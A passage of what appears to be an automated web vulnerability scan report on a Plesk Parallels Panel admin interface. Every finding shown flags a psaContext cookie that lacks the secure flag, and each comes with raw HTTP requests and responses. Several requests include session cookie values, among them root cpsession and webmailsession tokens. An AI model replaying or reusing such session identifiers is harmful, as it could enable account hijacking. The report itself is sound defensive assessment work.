GET /admin/customer-service-plan/edit/id/5 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list?context=service-plans Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:55:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:55:10 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:55:12 GMT Server: sw-cp-server Content-Length: 160630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list?context=service-plans HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:12:54 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:12:54 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:12:55 GMT Server: sw-cp-server Content-Length: 13086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 10515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 10515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/createpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/create
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/create HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 18:57:57 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 18:57:58 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 18:57:58 GMT Server: sw-cp-server Content-Length: 46021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list?context=customers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 18:57:50 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 18:57:52 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 18:57:52 GMT Server: sw-cp-server Content-Length: 17559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 16547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 16316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/true/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:16:54 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:54 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:54 GMT Server: sw-cp-server Content-Length: 16316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/login-info/id/4
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/login-info/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4 Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:03:01 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:03:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:03:01 GMT Server: sw-cp-server Content-Length: 10366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/overview/id/4
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/overview/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:02:47 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:02:47 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:02:47 GMT Server: sw-cp-server Content-Length: 21835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/personal-info/id/4
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/personal-info/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4 Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:02:52 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:02:52 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:02:52 GMT Server: sw-cp-server Content-Length: 28591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/domain/list
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=domains; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/domain/list?context=domains HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:07 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=domains; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:07 GMT Server: sw-cp-server Content-Length: 10295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/health/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=health; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/health/?group=Services HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:00:01 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:00:02 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=health; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:00:02 GMT Server: sw-cp-server Content-Length: 7263
